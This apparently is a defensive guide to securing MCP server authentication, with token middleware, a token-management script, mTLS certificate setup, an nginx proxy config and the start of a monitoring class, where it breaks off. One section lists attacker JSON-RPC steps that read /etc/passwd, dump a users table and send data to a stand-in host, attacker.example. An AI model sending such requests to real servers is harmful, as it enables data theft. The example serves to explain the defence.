MCP Authentication Gaps: Securing MCP Server Authentication
A defense-focused guide to understanding authentication weaknesses in MCP server deployments -- 38% of scanned servers lack any authentication -- and implementing robust token-based auth, mTLS, and middleware-based access control.
The MCP specification deliberately leaves authentication as an implementation concern rather than a protocol requirement. This design decision -- intended to reduce adoption friction -- has resulted in a security landscape where 38% of the 500+ publicly accessible MCP servers scanned by the VulnerableMCP project implement no authentication whatsoever.
For MCP servers accessible over HTTP+SSE, the absence of authentication means that anyone who can reach the server endpoint can list its tools, invoke them, and receive results. For stdio-based servers running locally, there is no credential check at all: whichever process spawns the server, or otherwise gains access to its stdin/stdout pipes, controls it.
Understanding the Authentication Gap
Why MCP Has No Built-In Authentication
The MCP protocol specification (version 2024-11-05) defines the message format, capability negotiation, and tool-call semantics, but explicitly does not define:
- How clients prove their identity to servers
- How servers validate that a client is authorized to call specific tools
- How transport channels are secured against eavesdropping or tampering
- How sessions are managed or revoked
MCP Protocol Layer (JSON-RPC 2.0):
┌────────────────────────────────────────┐
│  initialize / tools/list / tools/call  │  ← No auth fields in protocol
└───────────────┬────────────────────────┘
                │
                │  Transport Layer          ← Auth must be implemented here
┌───────────────┴────────────────────────┐
│ stdio (local) │ HTTP+SSE (network)     │
│ No auth       │ Auth is "optional"     │
│ Process-level │ TLS recommended        │
│ isolation only│ but not required       │
└────────────────────────────────────────┘
This layering means that security depends entirely on what the server implementer builds into the transport layer -- and most MCP server templates and tutorials ship without any authentication code.
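To make the layering concrete, the sketch below builds a tools/call request the way a client might and shows where a credential has to travel. The helper names and the token value are hypothetical; the only point is that the JSON-RPC body has no field for identity, so any credential rides in the transport (here, an HTTP header).

```python
import json


def build_tool_call(request_id: int, tool: str, arguments: dict) -> dict:
    """Build a JSON-RPC 2.0 tools/call message; note there is no auth field."""
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "tools/call",
        "params": {"name": tool, "arguments": arguments},
    }


def build_http_headers(bearer_token: str) -> dict:
    """Credentials live at the transport layer, here as an HTTP header."""
    return {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {bearer_token}",
    }


message = build_tool_call(1, "read_file", {"path": "notes.txt"})
headers = build_http_headers("mcp_example_token")  # hypothetical token value
body = json.dumps(message)  # what goes on the wire: no credential inside
```

A stdio server has no equivalent of the header, which is why its access control has to come from the operating system instead.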
Transport Types and Their Security Properties
stdio Transport:
┌──────────┐   stdin/stdout   ┌──────────┐
│ MCP Host │ ◄──────────────► │   MCP    │
│ (Client) │     (pipes)      │  Server  │
└──────────┘                  └──────────┘
Security: Process isolation only
Auth:     None (whoever spawns the process controls it)
Threats:  Local privilege escalation, supply chain
          (malicious package replaces server binary)

HTTP+SSE Transport:
┌──────────┐   HTTP POST/SSE  ┌──────────┐
│   MCP    │ ◄──────────────► │   MCP    │
│  Client  │    (network)     │  Server  │
└──────────┘                  └──────────┘
Security: Depends entirely on implementation
Auth:     Not required by spec -- must be added
Threats:  Unauthorized access, MITM, session hijacking,
          credential theft, denial of service

Streamable HTTP Transport (2025+):
┌──────────┐   HTTP streams   ┌──────────┐
│   MCP    │ ◄──────────────► │   MCP    │
│  Client  │ (bidirectional)  │  Server  │
└──────────┘                  └──────────┘
Security: Same as HTTP+SSE but with session management
Auth:     OAuth2 recommended but not enforced
Threats:  Same as HTTP+SSE plus session fixation
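One practical consequence of the comparison above is that a network transport should never be exposed beyond loopback unless authentication is switched on. The following is a minimal startup guard under that assumption; `check_bind_safety` and `is_loopback` are hypothetical helper names, not part of any MCP SDK.

```python
import ipaddress


def is_loopback(host: str) -> bool:
    """Return True if host is a loopback IP literal or the name 'localhost'."""
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Not an IP literal (some other hostname): treat as network-reachable
        return False


def check_bind_safety(host: str, auth_enabled: bool) -> None:
    """Refuse to expose an HTTP transport beyond loopback without auth."""
    if not auth_enabled and not is_loopback(host):
        raise RuntimeError(
            f"Refusing to bind {host} without authentication enabled"
        )
```

Calling `check_bind_safety(host, auth_enabled)` just before the server starts listening turns a silent misconfiguration into a hard failure.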
What Unauthenticated Access Enables
An attacker who reaches an unauthenticated MCP server can:
- Discover capabilities: Call tools/list to enumerate all available tools, their parameters, and descriptions
- Execute tools: Call tools/call with arbitrary parameters to invoke any registered tool
- Exfiltrate data: Use file-reading, database, or API tools to extract sensitive information
- Modify state: Use write tools to alter files, database records, or external systems
- Pivot further: Use the server's access to internal services as a lateral movement path
// An attacker can simply send JSON-RPC requests to an unauthenticated MCP server
// Step 1: Discover tools
{"jsonrpc": "2.0", "method": "tools/list", "id": 1}
// Step 2: Read sensitive files
{"jsonrpc": "2.0", "method": "tools/call", "id": 2,
 "params": {"name": "read_file", "arguments": {"path": "/etc/passwd"}}}
// Step 3: Access internal databases
{"jsonrpc": "2.0", "method": "tools/call", "id": 3,
 "params": {"name": "query_db", "arguments": {"query": "SELECT * FROM users"}}}
// Step 4: Exfiltrate via available tools
{"jsonrpc": "2.0", "method": "tools/call", "id": 4,
 "params": {"name": "http_request", "arguments": {
   "url": "https://attacker.example/collect",
   "method": "POST",
   "body": "stolen_data_here"
 }}}
Implementing Token-Based Authentication for MCP Servers
The most straightforward defense is adding token-based authentication to HTTP+SSE MCP servers. Below is a complete implementation.
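Before the full module, the core idea fits in a few lines: the server never stores a raw token, only its SHA-256 digest, and a presented token is accepted if its digest matches a stored one. This is a minimal sketch with hypothetical helper names (`issue_token`, `verify_token`); it leaves out expiry, scopes, and rate limiting.

```python
import hashlib
import hmac
import secrets


def issue_token() -> tuple[str, str]:
    """Return (raw_token, token_hash); hand the raw value to the client once."""
    raw = "mcp_" + secrets.token_urlsafe(32)
    return raw, hashlib.sha256(raw.encode()).hexdigest()


def verify_token(presented: str, stored_hashes: set[str]) -> bool:
    """Hash the presented token and compare against the stored digests."""
    digest = hashlib.sha256(presented.encode()).hexdigest()
    # compare_digest avoids leaking how many leading characters matched
    return any(hmac.compare_digest(digest, h) for h in stored_hashes)
```

Storing only digests means a leaked token store does not directly reveal usable credentials, which is the same property the token store in the full implementation relies on.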
Authentication Middleware
"""
MCP Authentication Middleware
Implements Bearer token and API key authentication for MCP HTTP+SSE servers.
"""
import os
import hashlib
import time
import json
import secrets
import logging
from dataclasses import dataclass
from typing import Optional
from datetime import datetime, timezone

logger = logging.getLogger("mcp.auth")


def _parse_utc(value: str) -> datetime:
    """Parse an ISO 8601 timestamp and return it as timezone-aware UTC."""
    # Accept the trailing "Z" written by the token manager script
    parsed = datetime.fromisoformat(value.replace("Z", "+00:00"))
    if parsed.tzinfo is None:
        parsed = parsed.replace(tzinfo=timezone.utc)
    return parsed


@dataclass
class AuthToken:
    """Represents an authenticated API token."""
    token_id: str
    client_name: str
    scopes: set[str]  # Allowed tool names or "*" for all
    created_at: datetime
    expires_at: Optional[datetime]
    rate_limit: int = 100  # Calls per minute
    is_active: bool = True


@dataclass
class AuthResult:
    """Result of an authentication attempt."""
    authenticated: bool
    token: Optional[AuthToken] = None
    error: Optional[str] = None
    client_ip: Optional[str] = None


class MCPAuthProvider:
    """
    Authentication provider for MCP servers.
    Supports Bearer tokens and API keys, both stored as SHA-256 hashes.
    """

    def __init__(self, token_store_path: str = "/var/mcp/auth/tokens.json"):
        self.token_store_path = token_store_path
        self.tokens: dict[str, AuthToken] = {}
        self._rate_tracker: dict[str, list[float]] = {}
        self._load_tokens()

    def _load_tokens(self):
        """Load token definitions from the JSON token store (hashes only)."""
        if not os.path.exists(self.token_store_path):
            logger.warning("Token store not found at %s", self.token_store_path)
            return
        with open(self.token_store_path, 'r') as f:
            data = json.load(f)
        for entry in data.get("tokens", []):
            # The store holds only the hash of each token, never the raw value
            token = AuthToken(
                token_id=entry["id"],
                client_name=entry["client_name"],
                scopes=set(entry.get("scopes", ["*"])),
                created_at=_parse_utc(entry["created_at"]),
                expires_at=(
                    _parse_utc(entry["expires_at"])
                    if entry.get("expires_at") else None
                ),
                rate_limit=entry.get("rate_limit", 100),
                is_active=entry.get("is_active", True),
            )
            # Key is the SHA-256 hash of the actual token value
            self.tokens[entry["token_hash"]] = token

    def authenticate(self, request_headers: dict,
                     client_ip: str = "unknown") -> AuthResult:
        """
        Authenticate an incoming MCP request.
        Checks for a Bearer token in the Authorization header or
        a key in the X-API-Key header.
        """
        # HTTP header names are case-insensitive and ASGI servers deliver
        # them lowercased, so normalise before looking anything up
        headers = {k.lower(): v for k, v in request_headers.items()}
        auth_header = headers.get("authorization", "")
        api_key = headers.get("x-api-key", "")
        raw_token = None
        if auth_header.startswith("Bearer "):
            raw_token = auth_header[7:]
        elif api_key:
            raw_token = api_key
        if not raw_token:
            logger.warning(
                "Authentication failed: no token provided from %s", client_ip
            )
            return AuthResult(
                authenticated=False,
                error="No authentication token provided",
                client_ip=client_ip,
            )

        # Hash the provided token and look it up
        token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
        token_record = self.tokens.get(token_hash)
        if token_record is None:
            logger.warning(
                "Authentication failed: invalid token from %s", client_ip
            )
            return AuthResult(
                authenticated=False,
                error="Invalid authentication token",
                client_ip=client_ip,
            )

        # Check token status
        if not token_record.is_active:
            return AuthResult(
                authenticated=False,
                error="Token has been revoked",
                client_ip=client_ip,
            )
        if (token_record.expires_at and
                datetime.now(timezone.utc) > token_record.expires_at):
            return AuthResult(
                authenticated=False,
                error="Token has expired",
                client_ip=client_ip,
            )

        # Check rate limit
        if not self._check_rate_limit(token_record.token_id,
                                      token_record.rate_limit):
            return AuthResult(
                authenticated=False,
                token=token_record,
                error="Rate limit exceeded",
                client_ip=client_ip,
            )

        logger.info(
            "Authenticated client '%s' (token: %s) from %s",
            token_record.client_name, token_record.token_id, client_ip,
        )
        return AuthResult(
            authenticated=True,
            token=token_record,
            client_ip=client_ip,
        )

    def authorize_tool_call(self, auth_result: AuthResult,
                            tool_name: str) -> bool:
        """Check if the authenticated client can call a specific tool."""
        if not auth_result.authenticated or auth_result.token is None:
            return False
        scopes = auth_result.token.scopes
        if "*" in scopes:
            return True
        return tool_name in scopes

    def _check_rate_limit(self, token_id: str, limit: int) -> bool:
        """Simple sliding window rate limiter (per token, 60-second window)."""
        now = time.time()
        window = self._rate_tracker.setdefault(token_id, [])
        # Remove entries older than 60 seconds
        self._rate_tracker[token_id] = [
            t for t in window if now - t < 60
        ]
        if len(self._rate_tracker[token_id]) >= limit:
            return False
        self._rate_tracker[token_id].append(now)
        return True

    @staticmethod
    def generate_token() -> tuple[str, str]:
        """
        Generate a new API token.
        Returns (raw_token, token_hash) -- only store the hash.
        """
        raw_token = f"mcp_{secrets.token_urlsafe(32)}"
        token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
        return raw_token, token_hash
Token Management Script
#!/bin/bash
# mcp-token-manager.sh -- Generate and manage MCP server authentication tokens
# Usage: ./mcp-token-manager.sh generate|revoke|list [options]
# Requires: jq, openssl, and GNU date (for `date -d`)
set -euo pipefail

TOKEN_STORE="/var/mcp/auth/tokens.json"
BACKUP_DIR="/var/mcp/auth/backups"

ensure_store_exists() {
    mkdir -p "$(dirname "$TOKEN_STORE")"
    mkdir -p "$BACKUP_DIR"
    chmod 700 "$(dirname "$TOKEN_STORE")"
    if [ ! -f "$TOKEN_STORE" ]; then
        echo '{"tokens": []}' > "$TOKEN_STORE"
        chmod 600 "$TOKEN_STORE"
    fi
}

generate_token() {
    local client_name="${1:?Usage: generate <client_name> [scopes] [expiry_days]}"
    local scopes="${2:-*}"
    local expiry_days="${3:-90}"
    ensure_store_exists

    # Generate secure random token
    local raw_token="mcp_$(openssl rand -base64 32 | tr -d '/+=' | head -c 43)"
    local token_hash
    token_hash=$(echo -n "$raw_token" | sha256sum | awk '{print $1}')
    local token_id
    token_id=$(openssl rand -hex 8)
    local created_at
    created_at=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
    local expires_at
    expires_at=$(date -u -d "+${expiry_days} days" +"%Y-%m-%dT%H:%M:%SZ")

    # Back up current store
    cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"

    # Add token to store (store only the hash)
    local tmp
    tmp=$(mktemp)
    jq --arg id "$token_id" \
       --arg name "$client_name" \
       --arg hash "$token_hash" \
       --arg scopes "$scopes" \
       --arg created "$created_at" \
       --arg expires "$expires_at" \
       '.tokens += [{
           "id": $id,
           "client_name": $name,
           "token_hash": $hash,
           "scopes": ($scopes | split(",")),
           "created_at": $created,
           "expires_at": $expires,
           "rate_limit": 100,
           "is_active": true
       }]' "$TOKEN_STORE" > "$tmp"
    mv "$tmp" "$TOKEN_STORE"
    chmod 600 "$TOKEN_STORE"

    echo "============================================"
    echo " MCP Token Generated Successfully"
    echo "============================================"
    echo " Token ID: $token_id"
    echo " Client: $client_name"
    echo " Scopes: $scopes"
    echo " Expires: $expires_at"
    echo ""
    echo " RAW TOKEN (save this -- it cannot be recovered):"
    echo " $raw_token"
    echo "============================================"
}

revoke_token() {
    local token_id="${1:?Usage: revoke <token_id>}"
    ensure_store_exists
    cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
    local tmp
    tmp=$(mktemp)
    # Mark the token inactive rather than deleting it, so the record stays auditable
    jq --arg id "$token_id" \
       '(.tokens[] | select(.id == $id)).is_active = false' \
       "$TOKEN_STORE" > "$tmp"
    mv "$tmp" "$TOKEN_STORE"
    chmod 600 "$TOKEN_STORE"
    echo "Token $token_id has been revoked."
}

list_tokens() {
    ensure_store_exists
    echo "Active MCP Tokens:"
    echo "-------------------"
    jq -r '.tokens[] | select(.is_active == true) |
        "ID: \(.id) Client: \(.client_name) Scopes: \(.scopes | join(",")) Expires: \(.expires_at)"' \
        "$TOKEN_STORE"
}

case "${1:-help}" in
    generate) generate_token "${@:2}" ;;
    revoke)   revoke_token "${@:2}" ;;
    list)     list_tokens ;;
    *)        echo "Usage: $0 generate|revoke|list [options]" ;;
esac
Integrating Auth Middleware with an MCP Server
"""
Example: MCP server with authentication middleware using the Python SDK.
"""
from mcp.server import Server
from mcp.server.sse import SseServerTransport
from mcp.types import TextContent, Tool
from starlette.applications import Starlette
from starlette.routing import Route, Mount
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.middleware import Middleware
from starlette.middleware.base import BaseHTTPMiddleware
import uvicorn

# The authentication module shown earlier, assumed to be saved as mcp_auth.py
from mcp_auth import MCPAuthProvider


class MCPAuthMiddleware(BaseHTTPMiddleware):
    """Starlette middleware that enforces MCP authentication."""

    # Paths that don't require authentication
    PUBLIC_PATHS = {"/health", "/ready"}

    def __init__(self, app, auth_provider: MCPAuthProvider):
        super().__init__(app)
        self.auth = auth_provider

    async def dispatch(self, request: Request, call_next):
        # Skip auth for health checks
        if request.url.path in self.PUBLIC_PATHS:
            return await call_next(request)

        # Authenticate the request. Starlette header lookups are
        # case-insensitive, so pass the two relevant headers explicitly.
        client_ip = request.client.host if request.client else "unknown"
        auth_result = self.auth.authenticate(
            {
                "Authorization": request.headers.get("authorization", ""),
                "X-API-Key": request.headers.get("x-api-key", ""),
            },
            client_ip,
        )
        if not auth_result.authenticated:
            return JSONResponse(
                {"jsonrpc": "2.0", "id": None, "error": {
                    "code": -32001,
                    "message": auth_result.error
                }},
                status_code=401,
                headers={"WWW-Authenticate": "Bearer"},
            )

        # Attach auth context to request state for tool-level authorization
        request.state.auth = auth_result
        return await call_next(request)


# Create the MCP server
server = Server("secure-mcp-server")
auth_provider = MCPAuthProvider("/var/mcp/auth/tokens.json")


# Define tools with authorization checks
@server.list_tools()
async def list_tools():
    return [
        Tool(
            name="read_file",
            description="Read a file from the workspace",
            inputSchema={
                "type": "object",
                "properties": {"path": {"type": "string"}},
                "required": ["path"],
            },
        ),
        Tool(
            name="query_database",
            description="Run a read-only database query",
            inputSchema={
                "type": "object",
                "properties": {"query": {"type": "string"}},
                "required": ["query"],
            },
        ),
    ]


@server.call_tool()
async def call_tool(name: str, arguments: dict):
    # Tool-level authorization would be checked here using the auth context
    # the middleware stored in request.state.auth.
    # This is a simplified example.
    if name == "read_file":
        path = arguments["path"]
        # ... validated file reading logic ...
        return [TextContent(type="text", text=f"Contents of {path}")]
    elif name == "query_database":
        query = arguments["query"]
        # ... validated query logic ...
        return [TextContent(type="text", text=f"Query results for: {query}")]
    # Fail loudly instead of silently returning None for unknown tools
    raise ValueError(f"Unknown tool: {name}")


# Wire up the Starlette app with auth middleware
sse = SseServerTransport("/messages/")


async def handle_sse(request: Request):
    async with sse.connect_sse(
        request.scope, request.receive, request._send
    ) as streams:
        await server.run(
            streams[0], streams[1], server.create_initialization_options()
        )


app = Starlette(
    routes=[
        Route("/sse", endpoint=handle_sse),
        Mount("/messages/", app=sse.handle_post_message),
    ],
    middleware=[
        Middleware(MCPAuthMiddleware, auth_provider=auth_provider),
    ],
)

if __name__ == "__main__":
    uvicorn.run(
        app,
        host="127.0.0.1",
        port=8443,
        ssl_certfile="/var/mcp/certs/server.crt",
        ssl_keyfile="/var/mcp/certs/server.key",
    )
Configuring mTLS for High-Security Deployments
For environments handling sensitive data or operating in regulated industries, mutual TLS provides strong cryptographic authentication where both client and server present certificates.
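What the server ultimately gets out of a successful mTLS handshake is a verified client certificate, and identity decisions are made from its fields. As a rough sketch, the function below summarises a certificate in the dictionary format returned by Python's `ssl.SSLSocket.getpeercert()`: it reads the Common Name and computes the remaining validity. The function name and the sample certificate are hypothetical and only illustrate the data shape.

```python
import ssl
import time
from typing import Optional


def client_identity(peercert: dict, now: Optional[float] = None) -> dict:
    """Summarise a verified client certificate (getpeercert() dict format)."""
    now = time.time() if now is None else now
    # "subject" is a tuple of RDNs, each a tuple of (key, value) pairs
    subject = {
        key: value
        for rdn in peercert.get("subject", ())
        for key, value in rdn
    }
    expires = ssl.cert_time_to_seconds(peercert["notAfter"])
    return {
        "common_name": subject.get("commonName"),
        "days_left": (expires - now) / 86400,
    }


# Hypothetical certificate data, shaped like getpeercert() output
sample = {
    "subject": (
        (("organizationName", "MCP Security"),),
        (("commonName", "agent-staging"),),
    ),
    "notAfter": "Jan  5 09:34:43 2018 GMT",
}
```

Tracking `days_left` alongside the Common Name makes it easier to rotate short-lived client certificates before they start failing handshakes.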
Certificate Authority Setup
#!/bin/bash
# setup-mcp-ca.sh -- Create a private CA for MCP mTLS authentication
set -euo pipefail

CA_DIR="/var/mcp/ca"
CERT_DAYS=365
CA_DAYS=3650

mkdir -p "${CA_DIR}"/{certs,private,crl,newcerts}
chmod 700 "${CA_DIR}/private"
touch "${CA_DIR}/index.txt"
echo 1000 > "${CA_DIR}/serial"

echo "[*] Generating CA private key..."
# -aes256 encrypts the key; openssl prompts for a passphrase
openssl genrsa -aes256 -out "${CA_DIR}/private/ca.key" 4096
chmod 400 "${CA_DIR}/private/ca.key"

echo "[*] Creating CA certificate..."
openssl req -new -x509 -days ${CA_DAYS} \
    -key "${CA_DIR}/private/ca.key" \
    -out "${CA_DIR}/certs/ca.crt" \
    -subj "/C=US/ST=Security/O=MCP Security/CN=MCP Internal CA" \
    -addext "basicConstraints=critical,CA:TRUE,pathlen:0" \
    -addext "keyUsage=critical,keyCertSign,cRLSign"

echo "[*] Generating MCP server certificate..."
openssl genrsa -out "${CA_DIR}/private/mcp-server.key" 2048
chmod 400 "${CA_DIR}/private/mcp-server.key"
openssl req -new \
    -key "${CA_DIR}/private/mcp-server.key" \
    -out "${CA_DIR}/certs/mcp-server.csr" \
    -subj "/C=US/ST=Security/O=MCP Security/CN=mcp-server"

# The heredoc body and its terminator stay flush left so the shell finds EXTEOF
openssl x509 -req -days ${CERT_DAYS} \
    -in "${CA_DIR}/certs/mcp-server.csr" \
    -CA "${CA_DIR}/certs/ca.crt" \
    -CAkey "${CA_DIR}/private/ca.key" \
    -CAcreateserial \
    -out "${CA_DIR}/certs/mcp-server.crt" \
    -extfile <(cat <<EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth
subjectAltName = DNS:mcp-server,DNS:mcp-server.internal,IP:127.0.0.1
EXTEOF
)

echo "[+] CA and server certificates created."
echo "    CA cert: ${CA_DIR}/certs/ca.crt"
echo "    Server cert: ${CA_DIR}/certs/mcp-server.crt"
echo "    Server key: ${CA_DIR}/private/mcp-server.key"

#!/bin/bash
# generate-mcp-client-cert.sh -- Generate a client certificate for MCP mTLS
# Usage: ./generate-mcp-client-cert.sh <client_name>
set -euo pipefail

CA_DIR="/var/mcp/ca"
CLIENT_NAME="${1:?Usage: generate-mcp-client-cert.sh <client_name>}"
CERT_DAYS=90

echo "[*] Generating client key for '${CLIENT_NAME}'..."
openssl genrsa -out "${CA_DIR}/private/${CLIENT_NAME}.key" 2048
chmod 400 "${CA_DIR}/private/${CLIENT_NAME}.key"

echo "[*] Creating CSR..."
openssl req -new \
    -key "${CA_DIR}/private/${CLIENT_NAME}.key" \
    -out "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
    -subj "/C=US/ST=Security/O=MCP Security/CN=${CLIENT_NAME}"

echo "[*] Signing with CA..."
# The heredoc body and its terminator stay flush left so the shell finds EXTEOF
openssl x509 -req -days ${CERT_DAYS} \
    -in "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
    -CA "${CA_DIR}/certs/ca.crt" \
    -CAkey "${CA_DIR}/private/ca.key" \
    -CAcreateserial \
    -out "${CA_DIR}/certs/${CLIENT_NAME}.crt" \
    -extfile <(cat <<EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature
extendedKeyUsage = clientAuth
EXTEOF
)

echo "[+] Client certificate created for '${CLIENT_NAME}'."
echo "    Cert: ${CA_DIR}/certs/${CLIENT_NAME}.crt"
echo "    Key: ${CA_DIR}/private/${CLIENT_NAME}.key"
echo "    Expires in ${CERT_DAYS} days"
echo ""
echo "    To use with curl:"
echo "    curl --cert ${CA_DIR}/certs/${CLIENT_NAME}.crt \\"
echo "         --key ${CA_DIR}/private/${CLIENT_NAME}.key \\"
echo "         --cacert ${CA_DIR}/certs/ca.crt \\"
echo "         https://mcp-server:8443/sse"
mTLS-Enabled MCP Server Configuration
"""
MCP server with mTLS authentication.
Extracts client identity from the TLS certificate.
"""
import ssl
import logging
from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.routing import Route
import uvicorn

logger = logging.getLogger("mcp.mtls")

# Client certificate CN -> allowed tool scopes
CLIENT_PERMISSIONS = {
    "agent-production": {"*"},                     # Full access
    "agent-staging": {"read_file", "list_files"},  # Read-only
    "monitoring": {"health_check", "get_metrics"}, # Monitoring only
}


def create_ssl_context() -> ssl.SSLContext:
    """Create SSL context with mTLS configuration."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # Server certificate and key
    ctx.load_cert_chain(
        certfile="/var/mcp/ca/certs/mcp-server.crt",
        keyfile="/var/mcp/ca/private/mcp-server.key",
    )
    # Require client certificates signed by our CA
    ctx.load_verify_locations(cafile="/var/mcp/ca/certs/ca.crt")
    ctx.verify_mode = ssl.CERT_REQUIRED
    # Strong TLS configuration. set_ciphers() only governs TLS 1.2 and below,
    # so it matters only if minimum_version is ever lowered.
    ctx.minimum_version = ssl.TLSVersion.TLSv1_3
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM")
    # Load CRL for revoked certificates. The file must exist; the CA setup
    # script shown earlier does not generate it.
    ctx.load_verify_locations(cafile="/var/mcp/ca/crl/revoked.pem")
    # Add the CRL flag without discarding the default verify flags
    ctx.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
    return ctx


async def extract_client_identity(request: Request) -> dict:
    """Extract client identity from the mTLS certificate."""
    # Assumption: the ASGI server exposes the asyncio transport under
    # scope["transport"]. This key is not part of the ASGI specification,
    # so verify it for the server in use.
    transport = request.scope.get("transport")
    if not transport:
        return {"authenticated": False, "error": "No transport"}
    peercert = transport.get_extra_info("peercert")
    if not peercert:
        return {"authenticated": False, "error": "No client certificate"}

    # Extract Common Name
    subject = dict(x[0] for x in peercert.get("subject", ()))
    client_cn = subject.get("commonName", "unknown")

    # Look up permissions
    scopes = CLIENT_PERMISSIONS.get(client_cn)
    if scopes is None:
        logger.warning("Unknown client CN: %s", client_cn)
        return {
            "authenticated": True,
            "authorized": False,
            "client_cn": client_cn,
            "error": "Client not in permissions table",
        }
    return {
        "authenticated": True,
        "authorized": True,
        "client_cn": client_cn,
        "scopes": scopes,
    }


async def handle_tool_call(request: Request):
    """Handle MCP tool calls with mTLS-based authorization."""
    identity = await extract_client_identity(request)
    if not identity.get("authenticated"):
        return JSONResponse({"error": "mTLS authentication failed"}, status_code=401)
    if not identity.get("authorized"):
        return JSONResponse({"error": "Client not authorized"}, status_code=403)

    # Parse JSON-RPC request
    body = await request.json()
    tool_name = body.get("params", {}).get("name", "")

    # Check tool-level authorization
    if "*" not in identity["scopes"] and tool_name not in identity["scopes"]:
        logger.warning(
            "Client %s attempted unauthorized tool call: %s",
            identity["client_cn"], tool_name,
        )
        return JSONResponse({
            "jsonrpc": "2.0",
            "error": {"code": -32003, "message": f"Not authorized for tool: {tool_name}"},
            "id": body.get("id"),
        }, status_code=403)

    # Process the authorized tool call
    logger.info("Authorized %s -> %s", identity["client_cn"], tool_name)
    # ... tool execution logic ...
    return JSONResponse({"jsonrpc": "2.0", "result": {"status": "ok"}, "id": body.get("id")})


app = Starlette(routes=[Route("/mcp", handle_tool_call, methods=["POST"])])

if __name__ == "__main__":
    # uvicorn.run() takes certificate paths rather than an SSLContext, so the
    # mTLS requirements are restated here. The CRL check configured in
    # create_ssl_context() is not applied on this path; use that context with
    # a server that accepts an ssl.SSLContext if revocation checks are needed.
    uvicorn.run(
        app,
        host="0.0.0.0",
        port=8443,
        ssl_certfile="/var/mcp/ca/certs/mcp-server.crt",
        ssl_keyfile="/var/mcp/ca/private/mcp-server.key",
        ssl_ca_certs="/var/mcp/ca/certs/ca.crt",
        ssl_cert_reqs=ssl.CERT_REQUIRED,
    )
Nginx Reverse Proxy with Authentication
For production deployments, place an Nginx reverse proxy in front of MCP servers:
# /etc/nginx/conf.d/mcp-server.conf
# Nginx reverse proxy for MCP server with authentication
upstream mcp_backend {
    server 127.0.0.1:8080;
    keepalive 32;
}

# Stock nginx exposes the full subject DN but not the CN on its own,
# so derive $ssl_client_s_dn_cn from $ssl_client_s_dn
map $ssl_client_s_dn $ssl_client_s_dn_cn {
    default "";
    ~(^|,)CN=(?<cn>[^,]+) $cn;
}

# Log format that records the client certificate identity
log_format mcp_client '$remote_addr - $ssl_client_s_dn_cn [$time_local] '
                      '"$request" $status $body_bytes_sent '
                      '"$ssl_client_verify"';

# Rate limiting zones
limit_req_zone $binary_remote_addr zone=mcp_init:10m rate=5r/m;
limit_req_zone $binary_remote_addr zone=mcp_tools:10m rate=30r/m;
limit_conn_zone $binary_remote_addr zone=mcp_conn:10m;

server {
    listen 443 ssl http2;
    server_name mcp.internal.example.com;

    # TLS configuration
    ssl_certificate /var/mcp/ca/certs/mcp-server.crt;
    ssl_certificate_key /var/mcp/ca/private/mcp-server.key;
    ssl_protocols TLSv1.3;
    ssl_ciphers ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;
    ssl_prefer_server_ciphers on;

    # mTLS -- require client certificates
    ssl_client_certificate /var/mcp/ca/certs/ca.crt;
    ssl_verify_client on;
    ssl_verify_depth 2;
    ssl_crl /var/mcp/ca/crl/revoked.pem;

    # Connection limits
    limit_conn mcp_conn 10;

    # Security headers
    add_header X-Content-Type-Options nosniff always;
    add_header X-Frame-Options DENY always;
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;

    # Health check (no rate limit or backend auth; a client certificate is
    # still required because ssl_verify_client applies to the whole server)
    location /health {
        proxy_pass http://mcp_backend/health;
        access_log off;
    }

    # SSE endpoint (initialization)
    location /sse {
        limit_req zone=mcp_init burst=3 nodelay;
        # Pass client certificate info to backend
        proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
        proxy_set_header X-Client-Verified $ssl_client_verify;
        proxy_set_header X-Client-Fingerprint $ssl_client_fingerprint;
        # SSE-specific proxy settings
        proxy_pass http://mcp_backend/sse;
        proxy_http_version 1.1;
        proxy_set_header Connection "";
        proxy_buffering off;
        proxy_cache off;
        proxy_read_timeout 3600s;
        proxy_send_timeout 3600s;
    }

    # Tool call endpoint
    location /messages/ {
        limit_req zone=mcp_tools burst=10 nodelay;
        proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
        proxy_set_header X-Client-Verified $ssl_client_verify;
        proxy_pass http://mcp_backend/messages/;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        # Request body size limit
        client_max_body_size 1m;
    }

    # Block everything else
    location / {
        return 404;
    }

    # Access logging with client identity
    access_log /var/log/nginx/mcp-access.log mcp_client;
    error_log /var/log/nginx/mcp-error.log warn;
}

# Redirect HTTP to HTTPS
server {
    listen 80;
    server_name mcp.internal.example.com;
    return 301 https://$server_name$request_uri;
}
Authentication Monitoring and Alerting
"""
MCP Authentication Monitoring -- detects authentication anomalies.
"""
import json
import logging
from datetime import datetime, timedelta, timezone
from collections import defaultdict
from dataclasses import dataclass

logger = logging.getLogger("mcp.auth.monitor")


def _utcnow() -> datetime:
    """Current time as naive UTC; AuthEvent.timestamp should be naive UTC too."""
    return datetime.now(timezone.utc).replace(tzinfo=None)


@dataclass
class AuthEvent:
    timestamp: datetime
    client_ip: str
    client_cn: str
    # success, failure, revoked, expired, rate_limited, unauthorized_tool
    event_type: str
    tool_name: str = ""
    details: str = ""


class AuthMonitor:
    """Monitors authentication events for anomalies."""

    def __init__(self, alert_callback=None):
        self.events: list[AuthEvent] = []
        # Running total of failures per IP (not windowed)
